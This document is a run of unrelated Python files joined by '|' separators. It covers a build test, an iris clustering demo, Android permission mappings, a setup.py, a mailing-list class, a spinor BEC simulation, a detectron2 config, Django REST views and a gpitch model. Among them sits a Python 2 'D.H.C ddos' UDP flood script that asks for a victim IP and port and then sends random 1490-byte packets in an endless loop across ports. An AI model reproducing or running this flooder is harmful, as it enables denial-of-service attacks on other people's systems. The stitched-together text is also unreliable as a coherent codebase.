                self.run("{p} -O -t {t} hello.c -o {t}/hello.s".format(p=os.environ["CC65"], t=target))
                self.run("{p} -t {t} {t}/hello.s -o {t}/hello.o".format(p=os.environ["AS65"], t=target))
                self.run("{p} -t {t} text.s -o {t}/text.o".format(p=os.environ["AS65"], t=target))
                self.run("{p} -o {o} -t {t} {t}/hello.o {t}/text.o {t}.lib".format(o=output, p=os.environ["LD65"], t=target))

    def test(self):
        # Success criterion: one linked binary exists per target.
        if not tools.cross_building(self.settings):
            for target in self._targets:
                assert os.path.isfile("hello_{}".format(target))
|
"""Compare K-means and DBSCAN clusterings of the iris data set, side by side
with the true labels, on features 2 and 3."""
# BUG FIX: `plt` was used below but matplotlib was never imported, so the
# script crashed with NameError at plt.figure().
import matplotlib.pyplot as plt
from sklearn import datasets
from sklearn.cluster import KMeans
from sklearn.cluster import DBSCAN

# load data
iris = datasets.load_iris()
x = iris.data
# Min-max scale each feature to [0, 1] so distances are comparable.
x = (x - x.min(axis=0)) / (x.max(axis=0) - x.min(axis=0))
y = iris.target

fig = plt.figure(figsize=(15, 5))

# original distribution: features 2 and 3, coloured by the true label
plt.subplot(131)
plt.scatter([xi[2] for xi in x], [xi[3] for xi in x], c=y)
plt.title('Origin')

# K-means cluster
plt.subplot(132)
y_pred = KMeans(n_clusters=3).fit_predict(x)
plt.scatter([xi[2] for xi in x], [xi[3] for xi in x], c=y_pred)
plt.title('K-means')

# DBSCAN cluster
plt.subplot(133)
y_pred = DBSCAN(eps=0.1, min_samples=5).fit_predict(x)
plt.scatter([xi[2] for xi in x], [xi[3] for xi in x], c=y_pred)
plt.title('DBSCAN')

plt.show()
|
import api_permission_mappings_api9 as api9
import api_permission_mappings_api10 as api10
import api_permission_mappings_api14 as api14
import api_permission_mappings_api15 as api15
import api_permission_mappings_api16 as api16
import api_permission_mappings_api17 as api17
import api_permission_mappings_api18 as api18
import api_permission_mappings_api19 as api19
import api_permission_mappings_api21 as api21
import api_permission_mappings_api22 as api22

# One mapping module per supported Android API level.
_API_MODULES = {
    "9": api9,
    "10": api10,
    "14": api14,
    "15": api15,
    "16": api16,
    "17": api17,
    "18": api18,
    "19": api19,
    "21": api21,
    "22": api22,
}

# API level -> {"AOSP_PERMISSIONS_BY_METHODS": ..., "AOSP_PERMISSIONS_BY_FIELDS": ...},
# each entry simply re-exporting that level module's two tables.
AOSP_PERMISSIONS_MAPPINGS = {
    level: {
        "AOSP_PERMISSIONS_BY_METHODS": module.AOSP_PERMISSIONS_BY_METHODS,
        "AOSP_PERMISSIONS_BY_FIELDS": module.AOSP_PERMISSIONS_BY_FIELDS,
    }
    for level, module in _API_MODULES.items()
}
|
import os
from setuptools import find_packages, setup  # noqa: H301

NAME = "svix-ksuid"
VERSION = "0.6.0"
# To install the library, run the following
#
# python setup.py install
#
# prerequisite: setuptools
# http://pypi.python.org/pypi/setuptools
REQUIRES = [
    "python-baseconv",
]

# Read the long description relative to this file (before the chdir below).
with open(os.path.join(os.path.dirname(__file__), "README.md")) as readme:
    README = readme.read()

# allow setup.py to be run from any path
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))

setup(
    name=NAME,
    version=VERSION,
    # BUG FIX: removed the stray leading space that showed up verbatim in
    # the published package summary.
    description="A pure-Python KSUID implementation",
    author="Svix",
    author_email="development@svix.com",
    url="https://github.com/svixhq/python-ksuid/",
    license="MIT",
    keywords=[
        "svix",
        "ksuid",
    ],
    classifiers=[
        "Intended Audience :: Developers",
        "Intended Audience :: Information Technology",
        "Operating System :: OS Independent",
        "Programming Language :: Python :: 3",
        "Programming Language :: Python",
        "Topic :: Software Development :: Libraries :: Application Frameworks",
        "Topic :: Software Development :: Libraries :: Python Modules",
        "Topic :: Software Development :: Libraries",
        "Topic :: Software Development",
        "Typing :: Typed",
        "License :: OSI Approved :: MIT License",
        "Programming Language :: Python :: 3 :: Only",
        "Programming Language :: Python :: 3.6",
        "Programming Language :: Python :: 3.7",
        "Programming Language :: Python :: 3.8",
    ],
    python_requires=">=3.6",
    install_requires=REQUIRES,
    zip_safe=False,
    packages=find_packages(exclude=["test", "tests"]),
    # Ship the py.typed marker so type checkers use the inline annotations.
    package_data={
        "": ["py.typed"],
    },
    long_description=README,
    long_description_content_type="text/markdown",
)
|
# Example of a mailing list manager
# We can run a testing SMTP server using:
# python3 -m smtpd -n -c DebuggingServer localhost:1025
from collections import defaultdict
from contextlib import suppress
from send_email import send_email
class MailingList:
    """Manage groups of e-mail addresses for sending e-mails.

    Group membership is kept in a ``defaultdict(set)`` mapping each
    address to the set of groups it belongs to, and can be persisted to
    a simple "email group1,group2" text file. The class also works as a
    context manager: entering loads the file, exiting saves it back.
    """

    def __init__(self, data_file):
        self.data_file = data_file
        self.email_map = defaultdict(set)

    def add_to_group(self, email, group):
        """Register `email` as a member of `group`."""
        self.email_map[email].add(group)

    def emails_in_groups(self, *groups):
        """Return the set of addresses belonging to at least one of `groups`."""
        wanted = set(groups)
        return {
            email
            for email, memberships in self.email_map.items()
            if memberships.intersection(wanted)
        }

    def send_mailing(self, subject, message, from_addr, *groups, headers=None):
        """Send one e-mail to every address in any of `groups`."""
        recipients = self.emails_in_groups(*groups)
        send_email(subject, message, from_addr, *recipients, headers=headers)

    def save(self):
        """Write the mapping to `data_file`, one "email group,group" line each."""
        with open(self.data_file, "w") as storage:
            for email, memberships in self.email_map.items():
                storage.write("{} {}\n".format(email, ",".join(memberships)))

    def load(self):
        """Replace the in-memory mapping with the contents of `data_file`."""
        # Start from a clean mapping so entries from a previous load
        # (or manual additions) do not linger.
        self.email_map = defaultdict(set)
        with suppress(IOError):  # a missing/unreadable file just means "empty list"
            with open(self.data_file) as storage:
                for line in storage:
                    # strip drops the trailing newline before splitting
                    email, memberships = line.strip().split(" ")
                    self.email_map[email] = set(memberships.split(","))

    def __enter__(self):
        self.load()
        return self

    def __exit__(self, type, value, traceback):
        self.save()
# Examples:
# create some addresses and groups and save them to a file
m = MailingList("addresses.db")
m.add_to_group("friend1@mail.com", "friends")
# NOTE(review): a "family1" address is added to the "friends" group here —
# possibly intentional (someone can be both), but worth confirming.
m.add_to_group("family1@mail.com", "friends")
m.add_to_group("family1@mail.com", "family")
m.save()
# load the saved addresses and groups into a new mailing list
m2 = MailingList("addresses.db")
m2.email_map  # defaultdict(set, {}) — empty until load() is called
m2.load()
m2.email_map
# defaultdict(set,
# {'friend1@mail.com': {'friends'},
# 'family1@mail.com': {'family', 'friends'}})
|
import numpy as np
import multiprocessing as mp
import pyfftw
from numpy import pi, exp, sqrt, sin, cos, conj, arctan, tanh, tan
from numpy import heaviside as heav
from include import helper
import h5py
# ---------Spatial and potential parameters--------------
Mx = My = 64
Nx = Ny = 128  # Number of grid pts
dx = dy = 1 / 2  # Grid spacing
dkx = pi / (Mx * dx)
dky = pi / (My * dy)  # K-space spacing
len_x = Nx * dx  # Box length
len_y = Ny * dy
x = np.arange(-Mx, Mx) * dx
y = np.arange(-My, My) * dy
X, Y = np.meshgrid(x, y)  # Spatial meshgrid

# Output file, opened in append mode; the spatial grids are stored first.
data = h5py.File('../data/splitting_dipole_data.hdf5', 'a')
data.create_dataset('grid/x', x.shape, data=x)
data.create_dataset('grid/y', y.shape, data=y)

# fftshift so the k-grid ordering matches the FFT's native frequency layout.
kx = np.fft.fftshift(np.arange(-Mx, Mx) * dkx)
ky = np.fft.fftshift(np.arange(-My, My) * dky)
Kx, Ky = np.meshgrid(kx, ky)  # K-space meshgrid

# Initialising FFTs: in-place 2-D transforms, threaded across all cores.
cpu_count = mp.cpu_count()
wfn_data = pyfftw.empty_aligned((Nx, Ny), dtype='complex128')
fft_forward = pyfftw.FFTW(wfn_data, wfn_data, axes=(0, 1), threads=cpu_count)
fft_backward = pyfftw.FFTW(wfn_data, wfn_data, direction='FFTW_BACKWARD', axes=(0, 1), threads=cpu_count)

# Framework for wavefunction data (k-space buffers for the three components)
psi_plus_k = pyfftw.empty_aligned((Nx, Ny), dtype='complex128')
psi_0_k = pyfftw.empty_aligned((Nx, Ny), dtype='complex128')
psi_minus_k = pyfftw.empty_aligned((Nx, Ny), dtype='complex128')

# Controlled variables
V = 0.  # Doubly periodic box
p = q = 0.  # Linear (p) and quadratic (q) Zeeman coefficients, both off here
c0 = 2
c1 = 0.5  # Effective 3-component BEC
k = 0  # Array index (used later as the frame-save counter)
# ------------------------------ Generating SQV's -------------------------
# Euler angles
alpha = 0.
beta = pi / 4
gamma = 0.

N_vort = 2  # Number of vortices
pos = [-10, 0, 10, 0]  # vortex positions (indexed per pair in the loop below)

# BUG FIX: these arrays are accumulated with "+=" below, so they must start
# at zero; np.empty left uninitialised memory in the phase field.
theta_k = np.zeros((N_vort, Nx, Ny))
theta_tot = np.zeros((Nx, Ny))

for k in range(N_vort // 2):
    # Scaling positional arguments onto the 2*pi-periodic box
    Y_minus = 2 * pi * (Y - pos[k]) / len_y
    X_minus = 2 * pi * (X - pos[N_vort // 2 + k]) / len_x
    Y_plus = 2 * pi * (Y - pos[N_vort + k]) / len_y
    X_plus = 2 * pi * (X - pos[3 * N_vort // 2 + k]) / len_x
    x_plus = 2 * pi * pos[3 * N_vort // 2 + k] / len_x
    x_minus = 2 * pi * pos[N_vort // 2 + k] / len_x
    # Sum over periodic images (nn) so the phase is consistent with the
    # doubly periodic boundary conditions.
    for nn in np.arange(-5, 5):
        theta_k[k, :, :] += arctan(
            tanh((Y_minus + 2 * pi * nn) / 2) * tan((X_minus - pi) / 2)) \
            - arctan(tanh((Y_plus + 2 * pi * nn) / 2) * tan((X_plus - pi) / 2)) \
            + pi * (heav(X_plus, 1.) - heav(X_minus, 1.))
    # Remove the net phase gradient introduced by the vortex pair offset.
    theta_k[k, :, :] -= (2 * pi * Y / len_y) * (x_plus - x_minus) / (2 * pi)
    theta_tot += theta_k[k, :, :]
# Initial wavefunction: all population placed in the middle component,
# carrying the vortex phase profile built above.
Psi = np.empty((3, Nx, Ny), dtype='complex128')
Psi[0, :, :] = np.zeros((Nx, Ny)) + 0j
Psi[1, :, :] = np.ones((Nx, Ny), dtype='complex128') * exp(1j * theta_tot)
Psi[2, :, :] = np.zeros((Nx, Ny)) + 0j
psi_plus, psi_0, psi_minus = helper.rotation(Psi, Nx, Ny, alpha, beta, gamma)  # Performs rotation to wavefunction

# Aligning wavefunction to potentially speed up FFTs
# NOTE(review): pyfftw.byte_align returns the aligned array; the return value
# is discarded here, so these calls likely have no effect — confirm intent.
pyfftw.byte_align(psi_plus)
pyfftw.byte_align(psi_0)
pyfftw.byte_align(psi_minus)
# ------------------------------------------------------------------------

# Normalisation constants: the initial norms, reused each step to renormalise.
N_plus = dx * dy * np.linalg.norm(psi_plus) ** 2
N_0 = dx * dy * np.linalg.norm(psi_0) ** 2
N_minus = dx * dy * np.linalg.norm(psi_minus) ** 2
# Time steps, number and wavefunction save variables
Nt = 80000  # total number of time steps
Nframe = 200  # a frame is saved every Nframe steps
dt = 5e-3  # time step
t = 0.

# Saving time variables:
data.create_dataset('time/Nt', data=Nt)
data.create_dataset('time/dt', data=dt)
data.create_dataset('time/Nframe', data=Nframe)

# Setting up variables to be sequentially saved.
# BUG FIX: Nt / Nframe is a float under true division; h5py dataset extents
# must be integers, so use floor division for the frame axis.
n_frames = Nt // Nframe
psi_plus_save = data.create_dataset('wavefunction/psi_plus', (Nx, Ny, n_frames), dtype='complex128')
psi_0_save = data.create_dataset('wavefunction/psi_0', (Nx, Ny, n_frames), dtype='complex128')
psi_minus_save = data.create_dataset('wavefunction/psi_minus', (Nx, Ny, n_frames), dtype='complex128')
for i in range(Nt):
    # Spin vector terms:
    F_perp = sqrt(2.) * (conj(psi_plus) * psi_0 + conj(psi_0) * psi_minus)
    Fz = abs(psi_plus) ** 2 - abs(psi_minus) ** 2
    F = sqrt(abs(Fz) ** 2 + abs(F_perp) ** 2)  # Magnitude of spin vector

    # Total density
    n = abs(psi_minus) ** 2 + abs(psi_0) ** 2 + abs(psi_plus) ** 2

    # Sin and cosine terms for the spin-rotation part of the solution.
    C = cos(c1 * F * (-1j * dt))
    # BUG FIX: the original set S = 0 on the WHOLE grid whenever F vanished at
    # any single point. Divide pointwise instead: S stays 0 only where F == 0
    # (there Fz and F_perp are also 0, so the value of S is irrelevant).
    S = np.zeros((Nx, Ny), dtype='complex128')
    np.divide(1j * sin(c1 * F * (-1j * dt)), F, out=S, where=F != 0)

    # First half kinetic-energy + quadratic-Zeeman step (in k-space).
    fft_forward(psi_plus, psi_plus_k)
    fft_forward(psi_0, psi_0_k)
    fft_forward(psi_minus, psi_minus_k)
    psi_plus_k *= exp(-0.25 * dt * (Kx ** 2 + Ky ** 2 + 2 * q)) / (Nx * Ny)
    psi_0_k *= exp(-0.25 * dt * (Kx ** 2 + Ky ** 2)) / (Nx * Ny)
    psi_minus_k *= exp(-0.25 * dt * (Kx ** 2 + Ky ** 2 + 2 * q)) / (Nx * Ny)
    fft_backward(psi_plus_k, psi_plus)
    fft_backward(psi_0_k, psi_0)
    fft_backward(psi_minus_k, psi_minus)
    # Rescaling: undo the FFT pair's Nx*Ny factor.
    psi_plus *= (Nx * Ny)
    psi_0 *= (Nx * Ny)
    psi_minus *= (Nx * Ny)

    # Trap, linear Zeeman & interaction flow.
    # BUG FIX: the rotation must act on the PRE-STEP fields; the original
    # reused the freshly updated psi_plus when computing psi_0 (and the new
    # psi_0 when computing psi_minus).
    old_plus, old_0, old_minus = psi_plus, psi_0, psi_minus
    psi_plus = ((C - S * Fz) * old_plus - 1. / sqrt(2.) * S * conj(F_perp) * old_0) * exp(-dt * (V - p + c0 * n))
    psi_0 = (-1. / sqrt(2.) * S * F_perp * old_plus + C * old_0 - 1. / sqrt(2.) * S * conj(F_perp) * old_minus) \
        * exp(-dt * (V + c0 * n))
    psi_minus = (-1. / sqrt(2.) * S * F_perp * old_0 + (C + S * Fz) * old_minus) * exp(-dt * (V + p + c0 * n))

    # Second half kinetic-energy + quadratic-Zeeman step.
    fft_forward(psi_plus, psi_plus_k)
    fft_forward(psi_0, psi_0_k)
    fft_forward(psi_minus, psi_minus_k)
    psi_plus_k *= exp(-0.25 * dt * (Kx ** 2 + Ky ** 2 + 2 * q)) / (Nx * Ny)
    psi_0_k *= exp(-0.25 * dt * (Kx ** 2 + Ky ** 2)) / (Nx * Ny)
    psi_minus_k *= exp(-0.25 * dt * (Kx ** 2 + Ky ** 2 + 2 * q)) / (Nx * Ny)
    fft_backward(psi_plus_k, psi_plus)
    fft_backward(psi_0_k, psi_0)
    fft_backward(psi_minus_k, psi_minus)
    # Rescaling
    psi_plus *= (Nx * Ny)
    psi_0 *= (Nx * Ny)
    psi_minus *= (Nx * Ny)

    # Renormalizing wavefunction: the real exponential factors above shrink
    # the norm, so restore each component to its initial norm.
    psi_plus *= sqrt(N_plus) / sqrt(dx * dy * np.linalg.norm(psi_plus) ** 2)
    psi_0 *= sqrt(N_0) / sqrt(dx * dy * np.linalg.norm(psi_0) ** 2)
    psi_minus *= sqrt(N_minus) / sqrt(dx * dy * np.linalg.norm(psi_minus) ** 2)

    # Prints current time and saves a frame every Nframe steps; k (left at 0
    # by the earlier vortex loop) indexes the next frame slot.
    if np.mod(i, Nframe) == 0:
        print('it = %1.4f' % t)
        psi_plus_save[:, :, k] = psi_plus[:, :]
        psi_0_save[:, :, k] = psi_0[:, :]
        psi_minus_save[:, :, k] = psi_minus[:, :]
        k += 1
    t += dt

data.close()
|
#from src.evaluation.test import test
from training.train import train
# Run training under the tag "batch16".
# NOTE(review): train() appears to return a session identifier that the
# (currently disabled) test step would consume — confirm in training.train.
session_name = train("batch16")
# test(session_name=session_name, is_visualize=False)
# test(session_name='test', is_visualize=True)
|
#-*-coding:utf8;-*-
#qpy:console
import sys
import os
import time
import socket
import random
#Code Time
from datetime import datetime
now = datetime.now()
hour = now.hour
minute = now.minute
day = now.day
month = now.month
year = now.year
##############
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes = random._urandom(1490)
#############
os.system("clear")
os.system("figlet D.H.C ddos")
print
print "Author : JOSELUCAS"
print "TEAM : D.H.C "
print "github : https://github.com/joselucas257/D.H.C_team"
ip = raw_input("ip da vitima : ")
port = input("Porta recomendado 80 : ")
os.system("clear")
os.system("figlet iniciando attack ")
print "[ ] 0% "
time.sleep(5)
print "[===== ] 25%"
time.sleep(5)
print "[========== ] 50%"
time.sleep(5)
print "[=============== ] 75%"
time.sleep(5)
print "[====================] 100%"
time.sleep(3)
sent = 0
while True:
sock.sendto(bytes, (ip,port))
sent = sent + 1
port = port + 1
print "Sent %s packet to %s throught port:%s"%(sent,ip,port)
if port == 65534:
port = 1 |
# Keypoint R-CNN (FPN backbone, 1x schedule) config assembled from the
# shared "common" config fragments of this config package.
from ..common.optim import SGD as optimizer
from ..common.coco_schedule import lr_multiplier_1x as lr_multiplier
from ..common.data.coco_keypoint import dataloader
from ..common.models.keypoint_rcnn_fpn import model
from ..common.train import train

# Freeze the backbone up to (and including) stage 2.
model.backbone.bottom_up.freeze_at = 2
# Initialise from ImageNet-pretrained R-50 weights.
train.init_checkpoint = "detectron2://ImageNetPretrained/MSRA/R-50.pkl"
|
from django.shortcuts import render
from django.http import HttpResponse
from django.contrib.auth.models import User
from rest_framework.views import APIView
from rest_framework import generics
from rest_framework.response import Response
from rest_framework import status
from api.serializers import CompanySerializer
from api.serializers import StudentSerializer
from api.serializers import TrainingProgramSerializer
from api.serializers import StudentApplicationSerializer
from api.serializers import ListTrainingsSerializer
from api.serializers import LoginSerializer
from api.serializers import TrainingProgramSerializer_CView
from api.serializers import SignUpSerializer
#from api.serializers import SfqSerializer
#from api.serializers import SfcSerializer
#from api.serializers import SfoSerializer
from api.models import Student
from api.models import Company
from api.models import TrainingProgram
from api.models import StudentApplications
from api.models import login_db
#from api.models import student_feedback_questions
#from api.models import student_feedback_choice
#from api.models import student_feedback_options
from django.contrib.auth.models import User
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib.auth import authenticate
from django.contrib.auth import login
from django.contrib.auth import logout
# Alias needed because the view classes below shadow the names `login`
# and `logout` at module level.
from django.contrib.auth import logout as auth_logout
from rest_framework.renderers import JSONRenderer
from rest_framework.parsers import JSONParser
from django.http import JsonResponse
from json import JSONEncoder
import json
class login(APIView):
    """
    login
    URL: [ip]:8000/login/
    Method: GET, POST
    Parameters: email, password
    Description:
        Authenticates a user; POST additionally returns the matching
        user record on success.
    """
    def get(self, request, format=None):
        # NOTE(review): sending credentials on a GET is unusual; confirm
        # existing clients depend on this before removing.
        serializer = LoginSerializer(data=request.data)
        if serializer.is_valid():
            userAuth = authenticate(username=serializer.data['email'], password=serializer.data['password'])
            if userAuth:
                return Response(status=status.HTTP_200_OK)
        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)

    def post(self, request, format=None):
        # The body arrives either as JSON or as a form-encoded
        # "email=...&password=..." string; try JSON first, then fall back.
        try:
            data = json.loads(str(request.body)[2:-1])
            username = data['email']
            password = data['password']
        except (ValueError, KeyError, TypeError):
            val = str(request.body)[2:-1].split("&")
            username = val[0].split('=')[1]
            password = val[1].split('=')[1]
        userAuth = authenticate(username=username, password=password)
        if userAuth:
            obj = User.objects.get(username=username)
            serializer = SignUpSerializer(obj)
            return Response(serializer.data)
        # BUG FIX: the status kwarg was the literal string
        # "status.HTTP_400_BAD_REQUEST" instead of the DRF constant.
        return Response(status=status.HTTP_400_BAD_REQUEST)
# class login(APIView):
# """
# login
# URL: [ip]:8000/login/
# Method: POST
# Parameters: email, password
# Output:
# Description:
# Login Method
# """
# def post(self, request, format=None):
# return HttpResponse("Hello")
class logout(APIView):
    """
    logout
    URL: [ip]:8000/logout/
    Method: POST
    Description:
        Terminates the authenticated user's session.
    """
    def post(self, request, format=None):
        # BUG FIX: the bare name `logout` here resolves to THIS class (the
        # class definition shadows django.contrib.auth.logout at module
        # level), so the original call only instantiated the view and never
        # ended the session — and the method returned None, which DRF
        # rejects. Use the aliased auth function and return a Response.
        auth_logout(request)
        return Response(status=status.HTTP_200_OK)
class add_company(APIView):
    """
    add_company
    URL: [ip]:8000/api/addcompany/
    Method: POST
    Parameters: company_name,
        address1,
        address2,(optional)
        city,
        state,
        pin,
        mobile,
        telephone,(optional)
        description,
        website,(optional)
        email,
        password
    Description:
        API to create a new company profile.
    """
    def post(self, request, format=None):
        req_data = request.body
        data = {}
        # Body may be JSON or form-encoded "key=value&..." pairs.
        try:
            data = json.loads(str(req_data)[2:-1])
        except ValueError:
            val = str(request.body)[2:-1].split("&")
            for i in val:
                i = i.split('=')
                data[i[0]] = i[1]
        # BUG FIX: this endpoint creates a Company profile; the original
        # instantiated the Student model with these company fields.
        obj = Company(company_name=data['company_name'],
                      address1=data['address1'],
                      address2=data['address2'],
                      city=data['city'],
                      state=data['state'],
                      pin=data['pin'],
                      mobile=data['mobile'],
                      email=data['email'],
                      description=data['description'],
                      website=data['website'],
                      password=data['password'],
                      )
        obj.save()
        # user = User.objects.create_user(obj['email'],obj['email'],obj['password'])
        return HttpResponse(obj)
class company_details(LoginRequiredMixin, APIView):
    """
    company_details
    URL: [ip]:8000/api/company/[company_id]/
    Method: GET, POST
    Parameters: id, company_name, address1, address2(optional), city,
        state, pin, mobile, telephone(optional), description,
        website(optional), email
    Description:
        API to get the details about a company given its company_id.
    """
    def _serialized(self, pk):
        # GET and POST return the same representation; share the lookup.
        return CompanySerializer(Company.objects.get(id=pk)).data

    def post(self, request, pk, format=None):
        return Response(self._serialized(pk))

    def get(self, request, pk, format=None):
        return Response(self._serialized(pk))
class add_student(APIView):
    """
    add_student
    URL: [ip]:8000/api/addstudent/
    Method: POST
    Parameters: first_name, last_name, gender, email, password, college,
        city, state, graduation_year, mobile, telephone
    Description:
        API to create a new student account/profile.
    """
    def post(self, request, format=None):
        raw = str(request.body)[2:-1]
        payload = {}
        # Body may be JSON or form-encoded "key=value&..." pairs.
        try:
            payload = json.loads(raw)
        except:
            for pair in str(request.body)[2:-1].split("&"):
                parts = pair.split('=')
                payload[parts[0]] = parts[1]
        record = Student(email=payload['email'],
                         first_name=payload['first_name'],
                         last_name=payload['last_name'],
                         gender=payload['gender'],
                         college=payload['college'],
                         city=payload['city'],
                         graduation_year=payload['graduation_year'],
                         mobile=payload['mobile'],
                         )
        record.save()
        # user = User.objects.create_user(obj['email'],obj['email'],obj['password'])
        return HttpResponse(record)
class student_details(APIView):
    """
    student_details
    URL: [ip]:8000/api/student/[student_id]/
    Method: GET, POST
    Parameters: id, first_name, last_name, gender, email, college, city,
        state, graduation_year, mobile, telephone
    Description:
        API to retrieve student details given the student id.
    """
    def _serialized(self, pk):
        # GET and POST return the same representation; share the lookup.
        return StudentSerializer(Student.objects.get(id=pk)).data

    def get(self, request, pk, format=None):
        return Response(self._serialized(pk))

    def post(self, request, pk, format=None):
        return Response(self._serialized(pk))
class add_training(APIView):
    """
    add_training
    URL: [ip]:8000/api/addtraining/
    Method: POST
    Parameters: training_name, description, eligibility, company,
        start_date, duration, stipend, deadline
    Description:
        API to create a new training program.
    """
    def post(self, request, format=None):
        raw = str(request.body)[2:-1]
        payload = {}
        # Body may be JSON or form-encoded "key=value&..." pairs.
        try:
            payload = json.loads(raw)
        except:
            for pair in str(request.body)[2:-1].split("&"):
                parts = pair.split('=')
                payload[parts[0]] = parts[1]
        program = TrainingProgram(training_name=payload['training_name'],
                                  description=payload['description'],
                                  eligibility=payload['eligibility'],
                                  company=Company.objects.get(id=payload['company']),
                                  start_date=payload['start_date'],
                                  duration=payload['duration'],
                                  stipend=payload['stipend'],
                                  deadline=payload['deadline'],
                                  )
        program.save()
        # user = User.objects.create_user(obj['email'],obj['email'],obj['password'])
        return HttpResponse(program)
class list_trainings(APIView):
    """
    list_trainings
    URL: [ip]:8000/api/listtrainings/
    Method: GET, POST
    Parameters: id, training_name, company, company_name, start_date,
        stipend, deadline
    Description:
        API to list every published training availability.
    """
    def _published(self):
        # Only programs already approved ("published") are listed.
        queryset = TrainingProgram.objects.filter(status="published")
        return ListTrainingsSerializer(queryset, many=True).data

    def get(self, request, format=None):
        return Response(self._published())

    def post(self, request, format=None):
        return Response(self._published())
class all_trainings(APIView):
    """
    all_trainings
    Method: GET, POST
    Parameters: id, training_name, company, company_name, start_date,
        stipend, deadline
    Description:
        API to list every training program regardless of status.
    """
    def _everything(self):
        # Unlike list_trainings, no status filter is applied.
        return ListTrainingsSerializer(TrainingProgram.objects.all(), many=True).data

    def get(self, request, format=None):
        return Response(self._everything())

    def post(self, request, format=None):
        return Response(self._everything())
class training_approval(APIView):
    """
    training_approval
    URL: [ip]:8000/api/approve/[id]
    Method: GET, POST
    Description:
        The trailing decimal digit of the URL id encodes the decision
        (1 = publish, anything else = discard); the remaining digits are
        the training program id.
    """
    def _decide(self, pk):
        pk = int(pk)
        approved = pk % 10 == 1
        program = TrainingProgram.objects.get(id=pk // 10)
        program.status = "published" if approved else "discarded"
        program.save()
        return HttpResponse(program)

    def get(self, request, pk, format=None):
        return self._decide(pk)

    def post(self, request, pk, format=None):
        return self._decide(pk)
class training_details(APIView):
    """
    training_details
    URL: [ip]:8000/api/training/[training_id]/
    Method: GET, POST
    Parameters: id, training_name, description, eligibility, company,
        start_date, duration, stipend, deadline, applicants_count
    Description:
        API to list details about the training program, given its id.
    """
    def _serialized(self, pk):
        # GET and POST return the same representation; share the lookup.
        return TrainingProgramSerializer(TrainingProgram.objects.get(id=pk)).data

    def get(self, request, pk, format=None):
        return Response(self._serialized(pk))

    def post(self, request, pk, format=None):
        return Response(self._serialized(pk))
class application_status(APIView):
    """
    application_status
    Method: GET, POST
    Parameters: id, training(id), student(id), status
    Status codes:
        1 -> Processing Application
        2 -> MCQ Screening
        3 -> Interview Process
        4 -> Company Matched
        5 -> Internship Started
        6 -> Completed Internship
        7 -> Stipend Recieved
        -ve -> Rejected
    Description:
        API to view the status of a student application.
    """
    def _serialized(self, pk):
        # GET and POST return the same representation; share the lookup.
        return StudentApplicationSerializer(StudentApplications.objects.get(id=pk)).data

    def get(self, request, pk, format=None):
        return Response(self._serialized(pk))

    def post(self, request, pk, format=None):
        return Response(self._serialized(pk))
class apply_training(APIView):
    """
    apply_training
    URL: [ip]:8000/api/apply/
    Method: POST
    Parameters: training(id), student(id)
    Description:
        API to hit when a student applies for an internship.
    """
    def post(self, request, format=None):
        data = {}
        req_data = str(request.body)[2:-1]
        # Body may be JSON or form-encoded "key=value&..." pairs.
        # BUG FIX: a leftover debug `return HttpResponse("Try Block")` inside
        # the try made every JSON submission exit before the application was
        # validated or saved.
        try:
            data = json.loads(req_data)
        except ValueError:
            temp = req_data.split('&')
            for i in temp:
                i = i.split('=')
                data[i[0]] = i[1]
        serializer = StudentApplicationSerializer(data=data)
        if serializer.is_valid():
            serializer.save()
            return Response(serializer.data, status=status.HTTP_201_CREATED)
        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
class company_view_training(APIView):
    """
    Description:
        API returning all training programs submitted by the company `pk`.
    """
    def get(self, request, pk, format=None):
        training_list = TrainingProgram.objects.all().filter(company_id=pk)
        serializer = TrainingProgramSerializer_CView(training_list, many=True)
        return Response(serializer.data)

    def post(self, request, pk, format=None):
        # BUG FIX: POST filtered on the program id (id=pk) while GET filtered
        # on the company (company_id=pk); both verbs should list the
        # company's programs, per the class's purpose.
        training_list = TrainingProgram.objects.all().filter(company_id=pk)
        serializer = TrainingProgramSerializer_CView(training_list, many=True)
        return Response(serializer.data)
class postStudentFeedback(APIView):
    # TODO: stub — reads the raw body but never parses or stores it, and
    # always returns the fixed placeholder text.
    def post(self, request, format=None):
        data = {}
        req_data = str(request.body)[2:-1]
        return HttpResponse("Response")
from gpitch.matern12_spectral_mixture import MercerMatern12sm
from gpitch.myplots import plot_predict
import matplotlib.pyplot as plt
import numpy as np
import tensorflow as tf
import gpitch
import gpflow
def per_fun(xin, npartials, freq):
    """Sum of the first `npartials` sine harmonics of `freq`, peak-normalised.

    Returns an array of xin's shape whose maximum absolute value is 1.
    """
    harmonics = (np.sin(2 * np.pi * xin * partial * freq)
                 for partial in range(1, npartials + 1))
    signal = sum(harmonics, np.zeros(xin.shape))
    return signal / np.max(np.abs(signal))
# generate data: a 3-partial 15 Hz component modulated by a two-bump envelope
# plus a little white noise.
n = 16000  # number of samples
fs = 16000  # sample frequency
x = np.linspace(0., (n-1.)/fs, n).reshape(-1, 1)
component = per_fun(xin=x, npartials=3, freq=15.)
envelope = np.exp(-25 * (x - 0.33) ** 2) + np.exp(-75 * (x - 0.66) ** 2)
envelope /= np.max(np.abs(envelope))
noise_var = 0.000001
y = component * envelope + np.sqrt(noise_var) * np.random.randn(component.size, 1)

# use maxima as inducing points
z, u = gpitch.init_liv(x=x, y=y, win_size=31, thres=0.05, dec=1)

# init kernels: Matern32 for the activation, spectral-mixture Matern12 for
# the component (frequencies match the three partials of the signal above).
kact = gpflow.kernels.Matern32(input_dim=1, lengthscales=1.0, variance=1.0)
enr = np.array([1., 1., 1.])
frq = np.array([15., 30., 45.])
kcom = MercerMatern12sm(input_dim=1, energy=enr, frequency=frq)
kern = [[kact], [kcom]]

# init model
m = gpitch.pdgp.Pdgp(x=x.copy(), y=y.copy(), z=z, kern=kern, minibatch_size=100)
# Keep the inducing-point locations fixed during optimisation.
m.za.fixed = True
m.zc.fixed = True

# optimization
method = tf.train.AdamOptimizer(learning_rate=0.005)
m.optimize(method=method, maxiter=1000)

# predict on a 4x-decimated grid to keep prediction cheap
xtest = x[::4].copy()
mu_a, var_a, mu_c, var_c, m_src = m.predict_act_n_com(xtest)

# plot results: reconstruction, activation posterior, component posterior
plt.figure(figsize=(12, 8))
plt.subplot(3, 1, 1)
plt.plot(xtest, m_src[0], lw=2)
